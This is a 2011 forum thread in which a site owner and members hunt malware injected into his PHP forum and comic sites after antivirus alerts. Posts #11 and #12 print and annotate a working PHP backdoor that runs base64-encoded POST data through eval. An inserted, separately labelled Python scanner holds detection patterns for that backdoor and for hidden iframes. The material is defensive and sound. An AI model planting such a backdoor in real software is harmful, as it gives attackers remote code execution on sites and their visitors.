Ongoing fight against hackers
Mata
post Apr 19 2011, 10:33 AM
Post #1


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,205
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



In the last couple of hours I've taken more steps to strengthen this site against hackers, but there will always be vulnerabilities that are harder to catch - basically, legions of hackers in poor countries can make money by finding new holes in code, therefore they always will.

If you get a virus/trojan/etc. warning from this or any of my sites please let me know immediately. Give me as many details as possible, either copy and paste text or with a screenshot of the details of the warning.

I will always try my best to keep this place secure, but there's only so much that can be done by myself and the team here. If you're not running any anti-malware, anti-virus, or a firewall then I highly recommend getting at the very least the Windows security software (which is a lot better than it used to be):

http://www.microsoft.com/en-us/security_es...ls/default.aspx

And get your browser vulnerabilities patched with Spybot:

http://www.safer-networking.org/en/index.html

Thanks for your help and patience. If anything comes up then please let me know ASAP!


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Moosh
post Apr 19 2011, 10:48 PM
Post #2


I plug directly into my computer
************

Group: Established Members
Posts: 3,643
Joined: 18-November 04
From: Manchester
Member No.: 1,488
Gender: Male



AVG popped these up when Firefox tried to load the RSS feed from your blog.


--------------------
QUOTE (Peter Griffin)
Math, my dear boy, is nothing more than the lesbian sister of biology.
Mata
post Apr 20 2011, 08:14 AM
Post #3





Oo, interesting one. I'll go check that out, though I've got no idea what it will look like. Thanks!


Mata
post Apr 20 2011, 03:12 PM
Post #4





I've had a try at fixing that. Could you see if it's worked please?


snooodlysnoosnoo...
post Apr 20 2011, 05:59 PM
Post #5


dream to make believe
************

Group: Established Members
Posts: 2,525
Joined: 12-January 04
From: England
Member No.: 863
Gender: Female



AVG is still throwing up a "Threat was blocked" warning occasionally when I come to the forum, forgot to get a shot of it though... will try and remember next time it comes up!


--------------------
Last.fm
snoo is about as evil as a muffin
Mata
post Apr 20 2011, 09:17 PM
Post #6





I got a script hidden in the forum code this afternoon too. It was pretty obscure so was unlikely to be triggered often. Let me know if it happens again please, but hopefully it's fixed.


Daria
post Apr 21 2011, 10:48 AM
Post #7


Wait for the uprising
************

Group: Established Members
Posts: 3,177
Joined: 7-April 05
From: In a cave in Scotland
Member No.: 1,735
Gender: Female



After realising that there's nowhere online I'd host a screenshot of the AVG threat, I messaged it to you on fb, Mata.
It was from the search newposts page.


--------------------
We are unraveling our navels so that we may ingest the sun.

DARIA IZ GOOD ON TOAST

TOAST IZ GOOD ON DARIA
Moosh
post Apr 21 2011, 11:05 AM
Post #8





QUOTE (Mata @ Apr 20 2011, 09:14 AM)
Oo, interesting one. I'll go check that out, though I've got no idea what it will look like. Thanks!

Yeah, I think that's got it. At least AVG's not objecting anymore.


Mata
post Apr 21 2011, 11:19 AM
Post #9





Daria is still seeing it, it seems.

Can anyone get a consistent reproduction of this problem?

Daria, can you get the error if you refresh your cached files? (I'm hoping that the script I found yesterday might have been the problem and it was lurking in your cache... But I think that's wishful thinking.)


Moosh
post Apr 21 2011, 02:31 PM
Post #10





Speak of the devil, different day, different computer and I get:


Mata
post Apr 21 2011, 02:57 PM
Post #11





Righty ho, I've finally managed to locate one nasty piece of code hiding in a cache file for the languages. The file was /forums/cache/lang_cache/en/lang_global.php

I'm assuming that this file is only accessed irregularly, so that would explain why Exploit Script Injection (type 1702) was only popping up occasionally.

The simplest method I've found for locating these problems is running a text search through all of the code on my site looking for the line 'base64_decode'. Almost every hack seems to use this to evade basic detection, but I've not seen a benevolent use of it yet, so it's definitely an indicator of shenanigans.

Another tricky one I've found hidden on a couple of files was this:

if (isset($_GET["cookie"])) { echo 'cookie=4'; if (isset($_POST["a9707a3e38"])) @eval(base64_decode($_POST["a9707a3e38"])); exit; }

I think what this was trying to do was email off cookies, probably to steal passwords, but I'm not quite sure how it works and it wasn't in a location that anyone else on here has access to, so it's nothing to be worried about.

So... Let me know if you see anything untoward happening again! I sincerely hope I've got all of this crap this time - it's taken many, many hours! (Of course, I'd rather know if there's still something I've missed!)


CrazyFooIAintGet...
post Apr 22 2011, 06:39 PM
Post #12


Has been kidnapped by gerbils and forced to post on here repeatedly
***********

Group: Established Members
Posts: 1,088
Joined: 18-September 03
From: London
Member No.: 606
Gender: Female



QUOTE (Mata @ Apr 21 2011, 03:57 PM)
Righty ho, I've finally managed to locate one nasty piece of code hiding in a cache file for the languages. The file was /forums/cache/lang_cache/en/lang_global.php

I'm assuming that this file is only accessed irregularly, so that would explain why Exploit Script Injection (type 1702) was only popping up occasionally.

The simplest method I've found for locating these problems is running a text search through all of the code on my site looking for the line 'base64_decode'. Almost every hack seems to use this to evade basic detection, but I've not seen a benevolent use of it yet, so it's definitely an indicator of shenanigans.

Another tricky one I've found hidden on a couple of files was this:

if (isset($_GET["cookie"])) { echo 'cookie=4'; if (isset($_POST["a9707a3e38"])) @eval(base64_decode($_POST["a9707a3e38"])); exit; }

I think what this was trying to do was email off cookies, probably to steal passwords, but I'm not quite sure how it works and it wasn't in a location that anyone else on here has access to, so it's nothing to be worried about.

So... Let me know if you see anything untoward happening again! I sincerely hope I've got all of this crap this time - it's taken many, many hours! (Of course, I'd rather know if there's still something I've missed!)

Hmm... my guess would be it's to hijack your admin session.

CODE
if (isset($_GET["cookie"])) {                        // check if a cookie was sent in the request (i.e. user is logged in)
    echo 'cookie=4';                                 // useless
    if (isset($_POST["a9707a3e38"]))                 // check if some POST variable was sent in the HTTP request. You'd have to be redirected here from a malicious site for this to be true
        @eval(base64_decode($_POST["a9707a3e38"]));  // execute it as PHP code
    exit;                                            // useless
}


--------------------
Kung fu fighting from 25th April 2010
Mata
post Apr 22 2011, 07:27 PM
Post #13





We should be good in that regard - the admin sessions are very short on here.

Has anyone had any new problems since yesterday afternoon?


Mata
post Apr 23 2011, 08:25 PM
Post #14





Okay, I've found this:

http://sitecheck.sucuri.net/scanner/?scan=....matazone.co.uk

Apparently it's on my comic, but I can't find it bloody anywhere.

I've run scans through my whole server for iframe commands and couldn't find this one. I couldn't find any nasty base64_decode commands either, so I don't think it's concealed in there. I've scanned all of my databases for iframe commands and I don't think it's in there either.

Help! Any suggestions to help find it appreciated.


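The file sweep Mata describes in post #11 (a text search for base64_decode), the eval-of-POST-data pattern CrazyFoo annotates in post #12, and the iframe hunt of post #14 can be combined into one indicator scan. This is an added example, not code from the forum or its software: the sample files are constructed (the first embeds the one-liner quoted in post #11), and the rule weights and verdict thresholds are assumptions chosen for ranking.

```python
import re
from dataclasses import dataclass, field

# (rule name, regex, weight). The weights are an assumption made for ranking.
RULES = [
    ("eval(base64_decode(...))", r"eval\s*\(\s*base64_decode\s*\(", 10),
    ("eval of request input", r"eval\s*\([^;]*\$_(?:POST|GET|REQUEST|COOKIE)\b", 8),
    ("hidden iframe", r"""<iframe\b[^>]*(?:width\s*=\s*["']?0\b|height\s*=\s*["']?0\b|display\s*:\s*none)""", 10),
    ("error-suppressed @eval", r"@\s*eval\s*\(", 4),
    ("opaque hex request key", r"""\$_(?:POST|GET|REQUEST)\s*\[\s*["'][0-9a-f]{8,}["']\s*\]""", 4),
    ("base64_decode (read by hand)", r"base64_decode\s*\(", 3),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE), w) for name, rx, w in RULES]

@dataclass
class Finding:
    path: str
    score: int = 0
    hits: list = field(default_factory=list)   # (rule name, line number)

    @property
    def verdict(self) -> str:
        if self.score >= 10:
            return "high"      # eval of decoded/request data, or a hidden iframe
        if self.score >= 3:
            return "medium"    # e.g. a lone base64_decode: open the file and look
        return "clean"

def scan_source(path: str, text: str) -> Finding:
    """Score one file; each rule counts once, at its first match."""
    finding = Finding(path)
    for name, rx, weight in COMPILED:
        m = rx.search(text)
        if m:
            finding.score += weight
            finding.hits.append((name, text.count("\n", 0, m.start()) + 1))
    return finding

def scan_all(files: dict) -> list:
    """Scan a {path: contents} mapping and return findings, worst first."""
    return sorted((scan_source(p, t) for p, t in files.items()), key=lambda f: -f.score)

# Constructed sample files. The first embeds the one-liner quoted in post #11.
SAMPLES = {
    "forums/cache/lang_cache/en/lang_global.php": """<?php
$lang = array('filler' => 'harmless cached string');
if (isset($_GET["cookie"])) { echo 'cookie=4'; if (isset($_POST["a9707a3e38"])) @eval(base64_decode($_POST["a9707a3e38"])); exit; }
""",
    "lib/mailer.php": """<?php
$body = base64_decode($attachment_data); // a legitimate use: decoding an attachment
""",
    "comic/template.php": """<html><body>
<iframe src="http://example.invalid/x" width="0" height="0"></iframe>
""",
    "index.php": "<?php echo 'hello';\n",
}

if __name__ == "__main__":
    for f in scan_all(SAMPLES):
        print(f"{f.verdict:6} score={f.score:2} {f.path}")
        for name, line in f.hits:
            print(f"        line {line}: {name}")
```

The "medium" tier exists because base64_decode alone does have legitimate uses (the mailer sample), so those files are queued for reading rather than flagged outright.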
SPEAKERfortheLOS...
post Apr 23 2011, 10:22 PM
Post #15


Transdimensional Traveler
************

Group: Established Members
Posts: 1,322
Joined: 20-August 04
From: Somewhere in the Æther
Member No.: 1,244
Gender: Secret



If you have the funding, try creating another domain like test.matazone.co.uk and recreate the comic.matazone.co.uk site there.

That way, once it is setup to your liking, you can find if the scan is a remnant of the past infection or if there is an underlying issue to be resolved.


--------------------
It is by caffeine alone I set my mind in motion,
It is by the beans of Java that thoughts acquire speed,
The hands acquire shaking, the shaking becomes a warning,
It is by caffeine alone I set my mind in motion.


Jack of all trades, master of none,
though offtimes better than master of one.

Carpe Noctem, pro cras nos necemus
Carpe Diem, pro hodie nos mutiamo

Daria
post Apr 24 2011, 01:46 AM
Post #16





I got it again today, twice: once on the Mittens Zombie Game, and once on the search new posts page. Forgot to get a screenshot of either one, I'm afraid :/


On a different note, I went back through the Mr Snaffleburger cartoons today because I was showing them to a friend. I found it interesting, Mata, that they were probably a huge influence on how I thought about corporate advertising and capitalism when I was in my early teens. So, thank you!


Mata
post Apr 24 2011, 09:43 AM
Post #17





I'd deleted the installation of PHPads and the associated database a couple of weeks ago after suspecting that this was the problem, but it seems that somehow the evocation code was compromised. I've no idea how, because the links pointed to a folder on my site and I know for a fact that the folder doesn't exist any more...

Still, I think that this has probably fixed the issue, so you're all back on watch again please - let me know if you see any trojan warnings again please!

Daria: my work here is done. It was a very deliberate choice at the time to try and make people question corporate messages (in an entertaining way). I'm very chuffed that this was effective and honoured that it may have played a tiny part in making you as awesome as you are.


Hobbes
post Apr 24 2011, 10:44 AM
Post #18


Advice for the young at heart
************

Group: Moderators
Posts: 2,708
Joined: 26-February 03
From: Essex, UK
Member No.: 33
Gender: Male



QUOTE (Mata @ Apr 23 2011, 09:25 PM)
Okay, I've found this:

http://sitecheck.sucuri.net/scanner/?scan=....matazone.co.uk

Apparently it's on my comic, but I can't find it bloody anywhere.


Your site has been showing up as clear for me, and I haven't had any alerts from virus or spyware software this time around. I've clicked my way through most of the forum and comic pages to see if anything has flagged up but nothing so far. Could it be browser-specific?
Mata
post Apr 24 2011, 07:39 PM
Post #19





Possibly, but hopefully I've fixed it!


Mata
post Apr 25 2011, 09:18 AM
Post #20





I've had one report of Kaspersky still being grumpy on my comic. Could people with AVG or Kaspersky clear their cached internet files and refresh the page on my comic please?

I'm really hoping I've got it fixed, but I need to know if it's not. I have never had any warnings with Firefox, Windows Security Essentials, and Spybot blocking script exploits, so I can't see these problems myself. Confirmation one way or another would be appreciated!


Pixelgoth
post Apr 25 2011, 07:50 PM
Post #21


Flaps and spins on the spot
************

Group: Established Members
Posts: 2,651
Joined: 17-June 03
From: At the end of the road to nowhere.....literally!
Member No.: 390
Gender: Female



Got a blocked threat message but don't know how to paste it here.


--------------------
Hope confidently, do valiantly, wait patiently!
Rather light a candle than complain about the dark!
Enjoy what you have and hope for what you lack
Thoughts become things, choose the good ones
Carpe diem
Mata
post Apr 26 2011, 07:59 AM
Post #22





Last night (about midnight UK time) I got desperate and overwrote the entire main layout template for my comic and I hope that's solved the problem there, although I would have much rather found the problem so I could identify it more easily in the future.

Pixie: did you get a warning while on my comic or on these forums? If it's on here then that's going to be a lot harder to fix, and I'm going to have to rest in the hands of Mr Fuzzy on that one. If there's anything nasty lurking on the forums (you know, other than SPS*) then I've got no idea how to find it past what I've already tried.

You can use the 'Prt Sc' button to take a screenshot of whatever is on your screen at the time. You can then paste it into MS Paint (or Photoshop preferably) and save the file. You can then attach the file to a message on Facebook.

*(We love you really, SPS).


Mata
post Apr 29 2011, 11:59 AM
Post #23





I've had one report of a trojan still lurking on the forums. Has anyone else seen this? It's the same as before: detected with AVG and suggesting that the problem is 'Script Exploit type 1702'. Once again, I can't find anything untoward in the code.


Moosh
post Apr 30 2011, 07:56 AM
Post #24





Yeah, I've started getting the same messages as above. Only sporadically though, not every time I come on matazone.co.uk, but they can be set off by the forums, the comic, the blog...


Mata
post Apr 30 2011, 12:03 PM
Post #25





Rargh!

Okay, please take a screenshot with the 'more details' tab revealed, and note the URL and time please. I've got no idea where to start.

I don't know enough about this to say what it could be, but is it possible that there is something on the server itself, not actually on my pages, that is randomly blipping a trojan warning out to any .php page?

